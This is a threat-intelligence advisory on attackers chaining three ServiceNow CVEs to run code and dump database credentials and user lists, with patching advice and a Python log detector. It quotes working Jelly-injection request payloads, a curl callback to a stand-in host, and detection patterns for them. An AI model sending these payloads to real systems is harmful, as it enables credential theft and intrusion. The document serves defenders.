Attackers Exploit Chain of Vulnerabilities in ServiceNow to Dump User List

By Adversary Tactics and Intelligence Team

Estimated Reading Time: 6 minutes

Vulnerability Exploitation – Remote Code Execution – ServiceNow – CVE-2024-4879, CVE-2024-5217, and CVE-2024-5178 – Information – Utilities – Public Administration

The Rundown

Deepwatch is warning customers and organizations that attackers are exploiting a chain of three vulnerabilities in ServiceNow to dump the user list and collect associated metadata from compromised instances. This activity was described in a blog post published July 24th by Resecurity.

The observed exploitation of these vulnerabilities in ServiceNow elevates the risks to organizations running vulnerable instances. Attackers can use the data gathered from exploitation attempts for cyberespionage and further targeting. Therefore, organizations should immediately apply updates to deny attackers the ability to exploit these vulnerabilities in attacks.

If you have questions or feedback about this intelligence, you can submit them here.

ServiceNow Exploitation

On July 11, 2024, Assetnote published a technical write-up describing how three vulnerabilities in ServiceNow can be chained together to give an attacker access to the application’s database and command execution on the host system running the application. These host systems typically reside within an organization’s internal network, so a compromise could extend to other internal systems.

The write-up describes three bugs that must be exploited to gain access to the database. The first bug is the title injection issue (CVE-2024-4879), the second is the template injection mitigation bypass (CVE-2024-5217), and the final bug is the filesystem filter bypass (CVE-2024-5178). By crafting a single request that addresses each of these bugs, an attacker can gain access to sensitive tables.

Analyst Note: An attacker does not have to chain all three vulnerabilities together. They can chain just the first two (CVE-2024-4879 & CVE-2024-5217) to achieve code execution. The last vulnerability (CVE-2024-5178) allows the attacker to bypass access controls on certain tables. An attacker could chain the first two vulnerabilities to implant a webshell or other malware types.

/login.do?jvar_page_title=<style><foo>abc</foo></style>

Request to perform title injection, allowing the injection of any template content. Source: Assetnote

/login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style>

Request to bypass template injection mitigation and achieve code execution. Source: Assetnote

/login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly:core" xmlns:g='glide'><g:evaluate>z=new Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>

Request to bypass filesystem filter and dump the full database credentials. Source: Assetnote

Analyst Note: Assetnote warns that because cloud-hosted ServiceNow instances require access to data on the internal network, enterprises commonly deploy a proxy server, known as a MID Server, inside the company’s internal network. Due to the design of ServiceNow, administrator access on a ServiceNow instance leads to command execution on the MID Server, so the impact of an authentication bypass could be quite severe.

On July 24th, Resecurity published a blog post describing how their network sensors logged multiple ServiceNow exploitation attempts that followed a three-stage process. Each stage used a single request that appeared to chain these vulnerabilities together and is similar to the requests described in Assetnote’s write-up.

The first stage of these attempts involved the attackers sending a specially crafted request to confirm whether a specific ServiceNow instance was vulnerable. In these probing requests, the attackers injected a payload and checked that the server’s response returned the expected result. This request, if successful, displays an error message with the value 1337 (668.5*2).

/login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(668.5*2);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E

Request observed to verify if the instance is vulnerable. Source: Resecurity

The second stage of exploitation involved sending a second request with a different payload that checks the database’s availability and contents. If successful, the vulnerable instance displays an error message containing key database details, such as the database’s name, URL, user, and password.

/login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nfglide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:j

Request to verify the database’s availability and contents. Source: Resecurity

The final stage, using the information obtained from the second stage, involved the attackers sending a third request with a different payload, which displays an error message containing the user list and associated metadata from the compromised instance. However, according to Resecurity, in most cases this data was hashed.

/login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gr=new GlideRecord("sys_user");gr.query();s="";while(gr.next())s=s.concat(gr.user_name," : ",gr.user_password,"<br/>");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>

Request to dump the user list and collect associated metadata. Source: Resecurity

Based on Resecurity’s analysis, the attackers were unsuccessful in cracking most of the hashes due to the complexity of the hashing algorithm. However, Resecurity’s blog post states that the disclosed information could still facilitate cyberespionage and reconnaissance efforts.

Targeting

Resecurity continued monitoring and identified that multiple organizations were targeted in these attacks across various geographies and market verticals, including but not limited to the information, utilities, and public administration sectors. However, all sectors may be targeted.

Details of the Vulnerabilities

On July 10, 2024, three vulnerabilities (CVE-2024-4879, CVE-2024-5217, and CVE-2024-5178) impacting ServiceNow were added to the National Vulnerability Database (NVD).

  • CVE-2024-4879 is a Jelly template injection vulnerability in ServiceNow UI Macros affecting the Vancouver and Washington DC releases that could allow an unauthenticated attacker to remotely execute code. This vulnerability has a CVSS 3.x score of 9.8 (Critical).
  • CVE-2024-5217 is an incomplete input validation vulnerability in GlideExpression Script affecting the Washington DC, Vancouver, and earlier releases that could allow an unauthenticated attacker to remotely execute code. This vulnerability has a CVSS 3.x score of 9.8 (Critical).
  • CVE-2024-5178 is an incomplete input validation vulnerability in the SecurelyAccess API affecting the Washington DC, Vancouver, and Utah releases that could allow an attacker with administrative privileges to gain unauthorized access to sensitive files on the web application server. This vulnerability has a CVSS 3.x score of 4.9 (Medium).

Actions & Recommendations

Deepwatch experts continuously monitor for threats to our customers and their ServiceNow environments when logging is available. The Adversary Tactics and Intelligence team regularly develops and updates detection signatures based on our intelligence operations. We also use this intelligence report to conduct threat hunting. However, Deepwatch experts cannot discover all activity due to limitations in the log sources that Deepwatch receives.

We recommend the following actions to enhance cyber resilience:

  • Apply the patches ServiceNow released for these vulnerabilities during the June 2024 patching cycle.
  • Review Internet facing assets to ensure they are updated and prioritized for patching.
  • Utilize Web Application Firewalls (WAFs).
  • Limit Access to this application directly from the Internet.
  • Ensure defensive network architecture and segmentation is in place for applications that are Internet facing.
  • Ensure authentication logging is enabled for all successful logins.
  • For on-premise deployments, ensure that host-based security protections are in place.

Technical Artifacts

We recommend that all customers retrospectively hunt for malicious activity, which will likely indicate compromise, using the Be On the Lookout (BOLO) guidance provided below:

  • Inbound web requests matching the below syntax directed at relevant ServiceNow applications (may be URL encoded depending on the dataset)
    • /login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*191);</g:evaluate></j:jelly></style>
    • /login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly:core" xmlns:g='glide'><g:evaluate>z=new Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>
    • /login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(668.5*2);</g:evaluate></j:jelly></style>
    • /login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly:core" xmlns:g='glide'><g:evaluate>z=new Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new SecurelyAccess(z.concat("/co..nfglide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>
    • /login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gr=new GlideRecord("sys_user");gr.query();s="";while(gr.next())s=s.concat(gr.user_name," : ",gr.user_password,"<br/>");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>
  • IDS alerts relating to the following CVEs
    • CVE-2024-4879 – (Jelly Template Injection Vulnerability)
    • CVE-2024-5217 – (Incomplete Input Validation in GlideExpression Script)
    • CVE-2024-5178 – (Incomplete Input Validation in SecurelyAccess API)
  • Rare/anomalous network connections from internal MID Servers that may indicate lateral movement from the primary ServiceNow instance (even cloud-based instances)
  • Rare/anomalous outbound web traffic from MID servers (especially with a curl/wget user agent) and/or execution of curl as shown below:
    • curl http://my.honeypot.server[.]example/?x=$(uname -a|base64 -w0)
      • This functions as a callback on MID Servers to confirm code execution, perform reconnaissance on the MID Server itself or surrounding network, and/or confirm the egress point (external IP) the MID Server is positioned behind
  • Rare/anomalous process execution on MID Servers, especially under C:\ServiceNow\ServiceNow MID Server <TRUNCATED>\agent\jre\bin\java.exe (see above curl example)
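The following Python helper is an added example written for this report; it is not code from Deepwatch, Resecurity, or Assetnote. It applies the BOLO guidance above to web-server access logs: it pulls the `jvar_page_title` value out of each request, percent-decodes it repeatedly (the guidance notes payloads may be URL encoded), and matches the Jelly/`g:evaluate` markers, the `SecurelyAccess` dot-dot filter bypass, the `glide.db.properties` read, and the `sys_user` query, then labels the hit with the exploitation stage described earlier. The sample log lines are constructed (Common Log Format, RFC 5737 test addresses); the indicator names and stage labels are this example's own conventions, not ServiceNow or vendor terminology.

```python
"""Flag ServiceNow Jelly-injection requests in web access logs (defender-side detection)."""
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (Common Log Format). They are NOT captured
# traffic; the payload fragments mirror the requests quoted in this report.
SAMPLE_LOGS = [
    # stage 1: arithmetic probe, URL-encoded as a proxy or WAF would record it
    '203.0.113.10 - - [25/Jul/2024:10:01:02 +0000] "GET /login.do?jvar_page_title='
    '%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3E'
    'gs.addErrorMessage(668.5*2);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1" 200 4821',
    # stage 2: SecurelyAccess filter bypass reading glide.db.properties
    '203.0.113.10 - - [25/Jul/2024:10:01:09 +0000] "GET /login.do?jvar_page_title='
    '%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3E'
    'u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();'
    '%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1" 200 5210',
    # stage 3: sys_user dump, logged without URL encoding
    '203.0.113.10 - - [25/Jul/2024:10:01:15 +0000] "GET /login.do?jvar_page_title='
    '<style><j:jelly xmlns:j="jelly" xmlns:g=\'glide\'><g:evaluate>gr=new GlideRecord("sys_user");'
    'gr.query();</g:evaluate></j:jelly></style> HTTP/1.1" 200 9934',
    # benign: a legitimate page title and an unrelated API call
    '198.51.100.7 - - [25/Jul/2024:10:02:00 +0000] "GET /login.do?jvar_page_title=Welcome%20to%20the%20Portal HTTP/1.1" 200 4102',
    '198.51.100.8 - - [25/Jul/2024:10:02:30 +0000] "GET /api/now/table/incident?sysparm_limit=1 HTTP/1.1" 200 812',
]

# Request line inside the quoted CLF field; lazy match tolerates raw spaces and quotes in the URL.
REQUEST_RE = re.compile(r'"(?:GET|POST) (.+?) HTTP/\d(?:\.\d)?"')

# Indicator names below are this example's own labels, not vendor signature names.
INDICATORS = {
    "jelly_template": re.compile(r"<j:jelly\b", re.I),
    "glide_evaluate": re.compile(r"<g:evaluate\b", re.I),
    "securelyaccess_dotdot": re.compile(r"SecurelyAccess\(.*?\.\.", re.I | re.S),  # e.g. "co..nf"
    "db_properties_read": re.compile(r"glide\.db\.properties", re.I),
    "sys_user_query": re.compile(r"GlideRecord\(\s*[\"']sys_user[\"']", re.I),
    "arith_probe": re.compile(r"addErrorMessage\(\s*[\d.]+\s*\*\s*[\d.]+\s*\)"),
}


def fully_unquote(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads cannot slip past the patterns."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def extract_title(log_line):
    """Return the decoded jvar_page_title value from a log line, or None if absent."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    query = urlsplit(match.group(1)).query
    # Split on '&' by hand: older parse_qs versions also split on ';', which the payloads contain.
    for pair in query.split("&"):
        name, sep, value = pair.partition("=")
        if sep and name == "jvar_page_title":
            return fully_unquote(value)
    return None


def classify(indicator_names):
    """Map matched indicators onto the three stages described in the report."""
    if "sys_user_query" in indicator_names:
        return "stage3_user_dump"
    if "db_properties_read" in indicator_names or "securelyaccess_dotdot" in indicator_names:
        return "stage2_db_credentials"
    if "glide_evaluate" in indicator_names or "jelly_template" in indicator_names:
        return "stage1_probe_or_rce"
    return None  # a plain page title, even an odd one, is not an alert


def analyze_request(log_line):
    """Return a finding dict for a suspicious request, or None for benign lines."""
    title = extract_title(log_line)
    if title is None:
        return None
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(title))
    stage = classify(hits)
    if stage is None:
        return None
    return {"stage": stage, "indicators": hits, "source": log_line.split(" ", 1)[0]}


def scan(lines):
    """Run the detector over an iterable of log lines and keep only findings."""
    return [finding for finding in map(analyze_request, lines) if finding]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(f"{finding['source']}  {finding['stage']}  {', '.join(finding['indicators'])}")
```

Decoding happens before matching, so the same rule covers the raw requests Assetnote published and the percent-encoded form Resecurity's sensors logged; the benign title line shows that simply seeing `jvar_page_title` is not enough to alert. To run this against a real dataset, replace `SAMPLE_LOGS` with the lines from your proxy, WAF, or ServiceNow access log and feed them to `scan`.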
